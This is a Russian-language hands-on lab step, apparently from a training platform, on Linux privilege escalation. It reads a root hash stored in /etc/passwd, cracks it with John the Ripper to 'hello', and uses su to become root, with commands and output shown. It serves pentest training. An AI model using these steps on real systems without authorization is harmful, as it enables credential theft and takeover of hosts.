На этом шаге мы научимся повышать привилегии, когда хеш пароля пользователя root хранится в файле /etc/passwd
, а не в файле /etc/shadow
.
-
Сначала настроим лабораторную среду. Откройте терминал и перейдите в каталог /home/labex/project
:
Если вы все еще находитесь под пользователем new - user
, вы можете использовать команду exit
, чтобы выйти из текущей оболочки до тех пор, пока не вернетесь к оболочке labex
, а затем перейти в каталог /home/labex/project
:
cd /home/labex/project
Выполните следующую команду для настройки лабораторной среды:
./env_setup2.sh
Эта команда выполнит скрипт, который настроит лабораторную среду. Вы должны увидеть вывод, указывающий, что среда готова.
-
После настройки вы войдете в систему как пользователь user001
, имитируя первоначальный доступ к оболочке, полученный во время пентест (проверки на проникновение).
Перейдите в домашний каталог пользователя user001
:
cd ~
-
Проверьте права доступа к файлам /etc/passwd
и /etc/shadow
:
ls -l /etc/passwd /etc/shadow
-rw-r--r-- 1 root root 2059 Apr 5 01:36 /etc/passwd
-rw-r----- 1 root root 1101 Apr 5 00:21 /etc/shadow
На этот раз права доступа к файлам настроены корректно
, и у вас есть только доступ на чтение к файлу /etc/passwd
.
-
Просмотрите содержимое файла /etc/passwd
, чтобы найти хеш пароля пользователя root:
cat /etc/passwd | grep ^root > ~/hash.txt
Проверьте содержимое файла hash.txt
, выполнив следующую команду:
cat ~/hash.txt
Ожидаемый вывод:
root:$1$ignite$J98A8EVPG1O40.WnwrPEM1:0:0:root:/root:/bin/bash
Обратите внимание, что хеш пароля пользователя root хранится во втором поле файла /etc/passwd
. Это обычно является результатом предыдущего взлома системы или неправильной настройки
со стороны системного администратора.
-
Теперь запустите john
для взлома хеша:
john ~/hash.txt > ~/cracked.txt
john
- это популярный инструмент для взлома паролей, который использует словарные атаки для взлома хешей паролей. Вывод будет указывать, был ли пароль успешно взломан.
Created directory: /home/user001/.john
Will run 2 OpenMP threads
Press 'q' or Ctrl - C to abort, almost any other key for status
1g 0:00:00:00 100% 2/3 5.000g/s 6680p/s 6680c/s 6680C/s 123456..crawford
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Проверьте содержимое файла cracked.txt
, чтобы просмотреть взломанный пароль:
Loaded 1 password hash (md5crypt [MD5 32/64 X2])
hello (root)
Как вы можете видеть, john
успешно взломал пароль, который равен hello
.
-
Используйте команду su
, чтобы переключиться на пользователя root, введя взломанный пароль при запросе:
su root
Введите пароль hello
при запросе. Теперь у вас должны быть привилегии root, что подтверждается изменением приглашения командной строки.
user001@660ecfa4d7612c798ef141ab:~$ su root
Password:
root@660ecfa4d7612c798ef141ab:/home/user001#